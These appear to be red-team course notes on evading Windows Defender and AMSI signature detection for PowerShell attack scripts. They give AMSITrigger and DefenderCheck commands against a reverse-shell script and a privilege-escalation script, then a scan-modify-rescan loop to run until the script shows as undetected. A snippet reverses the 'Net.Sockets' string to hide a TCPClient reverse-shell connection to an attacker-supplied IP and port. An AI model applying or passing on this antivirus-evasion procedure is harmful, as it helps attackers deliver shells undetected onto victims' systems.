PowerShell Scripts

Use AMSITrigger to find the exact part of the script that was deteced

Use DefenderCheck to find the code and strings from a binary the WD may flag

AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1

Steps to avoid signature based detection:

1. Scan using AMSITrigger

2. Modify the detected code snippet

   1. Reverse strings

   2. Modify other words

3. Rescan using AMSITrigger

4. Repeat the steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or “Blank”

Reverse example

$String =
"stekcoS.teN"
$class = ([regex]::Matches($String,'.',
'RightToLeft') | ForEach
{$_.value}) -join ''
if ($Reverse)
{
 $client = New-Object System.$class.TCPClient($IPAddress,$Port)
}

Use Invoke-Obfuscation for full obfuscation of PowerShell scripts